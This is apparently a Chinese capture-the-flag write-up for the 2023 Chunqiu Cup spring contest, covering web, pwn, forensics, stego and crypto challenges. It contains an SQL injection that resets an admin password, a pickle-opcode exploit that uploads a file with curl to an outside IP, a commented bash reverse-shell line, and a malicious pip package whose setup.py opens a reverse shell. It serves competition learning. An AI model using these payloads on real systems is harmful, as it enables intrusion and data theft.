2023春秋杯网络安全联赛春季赛
原创
Phpstudy
本来以为是XSS+CSRF反弹shell,但是一直弹不上,猜测是登陆界面sql注入
放入X-Requested-With:XMLHttpRequest请求头就能进入登陆界面
用户名sqk注入改密码
admin' ;UPDATE ADMINS set PASSWORD ='c26be8aaf53b15054896983b43eb6a65';--
admin/123456
计划任务执行cat /f*
Easypy
Dir扫目录,有个download路由,下载源码
被删了,有个pyc反编译一下得到源码
from flask import Flask, Response, request
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return '小p想要找一个女朋友,你能帮他找找看么?'
@app.route('/girlfriends', methods=['GET', 'POST'])
def girlfriends():
if request.values.get('data'):
data = request.values.get('data')
numpydata = base64.b64decode(data)
if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:
return '不能走捷径啊'
resp = numpy.loads(numpydata)
return '可以的,要的就是一种感觉'
return '有进步了,但是不多'
@app.route('/download', methods=['GET', 'POST'])
def download():
with open('www.zip', 'rb') as (f):
stream = f.read()
response = Response(stream, content_type='application/octet-stream')
response.headers['Content-disposition'] = 'attachment;filename=www.zip'
return response
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)过滤了R,sh,bash,利用点是resp = numpy.loads(numpydata)
Pickle反序列化,手搓opcode
过滤了上面这些字符,所以直接先将执行的内容存到文件里,利用vps外带
Exp如下
import base64
import pickletools
a = b'''(S'curl -T 1.txt http://101.42.45.215:5002'
ios
system
.
'''
# a = b'''(S'cat /f*>1.txt'
# ios
# system
# .
# '''
#S'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'
a = pickletools.optimize(a)
print(a)
print(base64.b64encode(a))传参base64编码后的内容,监听即可得到flag
happy2forensic
导出http:
改为压缩包得到:
取证大师加载一下发现BitLocker解密:
根据提示找到tcp.srcport == 20 && tcp.dstport == 80
提取出来得到:bitlocker:120483-350966-299189-055297-225478-133463-431684-359403
解密得:
有好多图片,取证大师试用无法一次性全部提取,发现有一个图片很大,提取出来
Foremost一下:
使用magick montage拼接一下:
猜测是password:856a-a56b6a705653
flag2:-919c-a140d7054ac5
使用AXIOM Process挂载一下:
Flag1:f97d5b05-d312-46ac
拼接一下flag{f97d5b05-d312-46ac-919c-a140d7054ac5}
盲人会藏在哪里
加一下文件头得到密码
ChunJiSai7k7kbibi@!
得到坤坤:
Zsteg查看一下:
发现了个ag{,提取一下看看
flag{2c8ba897-0205-9bff-123d-281d12a24c38}
p2048
from pwn import *
p = remote('39.106.65.236', 29728)
p.sendline(b't'*0x400)
p.interactive()玩几次就会溢出偏移到后门函数
flag{3834fe18-932d-4b34-9427-57565f0a803c}
piphack
上传恶意python包
from setuptools import setup
import socket,subprocess,os
def con():
import socket, time,pty, os
host='101.42.45.215'
port=7788
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host,port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
con()
setup(name="root", version="1.0")压缩之后改成png格式,然后h->H绕过过滤,监听端口pip传该地址,下载这个png
反弹到shell得到flag
flag{4661747e-c7ed-4d2e-a2ee-315243be16a8}
php_again
利用PHP的OPcache机制getshell | Chybeta
下划线用[绕不过去,用点绕过
OPcache缓存路径在/tmp,目录服务器端开启了 opcache.file_cache_only,禁用了opcache.validate_timestamps
GoSecure/php7-opcache-override: Security-related PHP7 OPcache abuse tools and demo (github.com)
然后这case的值有效的依次是0.0 73 7 1365 777777
构造目录穿越写文件解压,找准时间戳,路径是../../../../../tmp/8131f93e8d92a77c0a8ff12ef84b05b1/var/www/html/index.php.bin,即可覆盖掉原本的index.php数据,实现getshell
时间戳通过读取的www.zip即可获得,将读取的zip下载到本地
修改时间即可得到时间戳
然后就是获取一个index.php.bin这个就需要本地搭建一个和题目一样的环境即php-8.2.2-apache的,用docker搭建即可
搭建之后进去修改一下这个地方
/usr/local/etc/php
zend_extension=/usr/local/lib/php/extensions/no-debug-non-zts-20220829/opcache.so //默认存在该扩展,只要把so文件引进来即可
opcache.file_cache => /tmp => /tmp
opcache.enable => On => On
opcache.validate_timestamps => On => On
opcache.file_cache_only => 1 => 1
更改之后进行重启service apache2 restart
PHP version : 8.2.2
Zend Extension ID : API420220929,NTS
Zend Bin ID : BIN_48888
Assuming x86_64 architecture
------------
System ID : 0f79c4aa63d189f1791711bf763f665a
本地
PHP version : 8.2.2
Zend Extension ID : API420220829,NTS
Zend Bin ID : BIN_48888
Assuming x86_64 architecture
------------
System ID : afa4539c4004328fa36a41c0ec790101
这个题目最后没写出来,学习ing
checkin
第一部分求解一下pell函数得到x,y
def solve_pell(N, numTry = 100):
a=[]
b=[]
cf = continued_fraction(sqrt(N))
for i in range(numTry):
denom = cf.denominator(i)
numer = cf.numerator(i)
if numer^2 - N * denom^2 == 1:
a.append(numer)
b.append(denom)
return a,b
N = 1117
a,b=solve_pell(N)
print(b)直接使用二项式展开定理即可还原flag
n = 14381700422128582509148801752355744589949207890477326887251636389639477554903212313766087310581920423926674144511237847467160303159477932732842314969782540035709454603184976310835433114879043016737665256729350745769071186849072915716081380191025215059636548339167264601163525017898164466972776553148697204889820118261937316228241099344357088387154112255824092894798716597134811437852876763391697588672779069166285303075312833415574850549277205130215394422655325352478386576833373623679069271857652029364332047485797407322257853316210866532938722911480593571175419708834718860211036796987231227104370259051299799633809
enc1 = 7213976567554002619445032200800186986758840297933991288547009708561953107405266725278346810536664670987171549114913443730366439254199110599202411546254632702440251000149674899033994570393935743323319736976929843596350656674709510612789987746895513057821629144725499933366382123251520676386059405796801097683107223771674383940907066300331503757142088898427893069444164604408189686282018392714450005250018004986102062209998463347007934222341910941474212611569508001910685822097788669516018081617394144015000387497289693096617795809933540456797387940627782045397249431573540932386564021712811633992948508497879189416719996092292320828635490820907122756459412206735413770335545012892724496210585503157766011075566023635046144730429791359690237088629187946232458937292767085665897489251315749496284368726255508362410603108788759785472319449267909859926786774679533591222665476101832482161295321411313525830843915966136814748249906589458905410141906965538387896747375546846618213595165688661941876715858338407833641907024891922856719044736945863722003318526031957256722493189062624177017279248142024760515092698242159769372410662895078523142768353100643884341413944795392762315999109544070401451087596138520908569234305384182336436670714204963907240715652950621301644972412252424876159530992
enc2 = 15954854445966181136742750543358176358186230663706091821454832527034640100670779737656720251005109942306013877086451482243141488450122353285697850016200364912263403464109626937525725210545566742746628476797261121321515812788726862118315480354196115424526212965145342675007815411995594752584377871686965531829990461770047418586001518916553661158567047779694730702789677326905844275827365395845945286695577426050334364557405151339008293258932006267159313380746863008928500607405457044370494583863960981060999695448408234857505591647503423149271589648863473472196402149897680041851877198062464480400493467334040101779732999029043327947071232256187123316057998759518569161852646625701393295408789279678540894319137126821001853808931387200759810381958895695749251834840804088478214013923869059004663359509316215974475427057000629842098545503905230785431115754636129549758888267877395566717448365986552725726428222769339088308242580851434964429627168365161743834285778996916154182286570122208454025753108647581888781783757375011437394936853319184725324597963035778640646869326035848170752766298225095197226934969602554875402243303906613183431896300664684256018886119255870435413622515792072064528098344111446380223430819596310173312668368618931885819458529703118195242890075359424013033800260927722161030183373647798407301688760998313223874318513944409702828538509864933624724225689414495687466779277994989628367119101
D = 1117
x = 87897747594260774254246835664214545379849
y = 2629972211566463612149241455626172190220
p=(enc1-1)//(233*n**2)
enc2=enc2%(n**2)
p1=(enc2-1)//(y*n)
from Crypto.Util.number import *
print(long_to_bytes(p)+long_to_bytes(p1))
#flag{11e89e28-4e27-47f0-a7c7-8e66c18881be}backdoor
可以直接将z表示出来然后就能求解key了
from Crypto.Util.number import *
from Crypto.Util.Padding import pad
from random import randint
from Crypto.Util.strxor import strxor
from Crypto.Cipher import AES
from hashlib import sha256
from hashlib import md5
(w,a,b,x)=(31889563, 31153, 28517, 763220531)
(A,B,P)=(1064988096, 802063264240, 12565302212045582769124388577074506881895777499095598016237085270545754804754108580101112266821575105979557524040668050927829331647411956215940656838233527)
G=(359297413048687497387015267480858122712978942384458634636826020013871463646849523577260820163767471924019580831592309960165276513810592046624940283279131, 9290586933629395882565073588501573863992359052743649536992808088692463307334265060644810911389976524008568647496608901222631270760608733724291675910247770)
M1=(10930305358553250299911486296334290816447877698513318419802777123689138630792465404548228252534960885714060411282825155604339364568677765849414624286307139, 7974701243567912294657709972665114029771010872297725947444110914737157017082782484356147938296124777392629435915168481799494053881335678760116023075462921)
M2=(497353451039150377961380023736260648366248764299414896780530627602565037872686230259859191906258041016214805015473019277626331812412272940029276101709693, 8439756863534455395772111050047162924667310322829095861192323688205133726655589045018003963413676473738236408975953021037765999542116607686218566948766462)
B_=(5516900502352630982628557924432908395278078868116449817099410694627060720635892997830736032175084336697081211958825053352950153336574705799801251193930256, 10314456103976125214338213393161012551632498638755274752918126246399488480437083278584365543698685202192543021224052941574332651066234126608624976216302370)
c=b'\x1a\xfb\xa2\xe1\x86\x04\xfak\x9a\xa3\xd15\xb8\x16\x1d\xbc\xa9S\xf5;\xfa\xf1\x08dn~\xd4\x94\xa4;^*\xf6\xd7\xf10\xa3\xe1k`\x1f-\xef\x80\x16\x80\x80\xe2'
E = EllipticCurve(GF(P), [A, B])
G=E(G)
M1=E(M1)
M2=E(M2)
B_=E(B_)
z=M1-w*G-a*x*M1-x*b*G
k2 = sha256(str(z[0]).encode()).digest()[:6]
k2 = bytes_to_long(k2)
shared_key2 = k2 * B_
key = md5(str(int(shared_key2[0])).encode()).digest()
cipher = AES.new(key, AES.MODE_ECB)
ct = cipher.decrypt(c)
print(ct)
#flag{63259ab8-4916-4095-8888-d92c2b003e18}原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号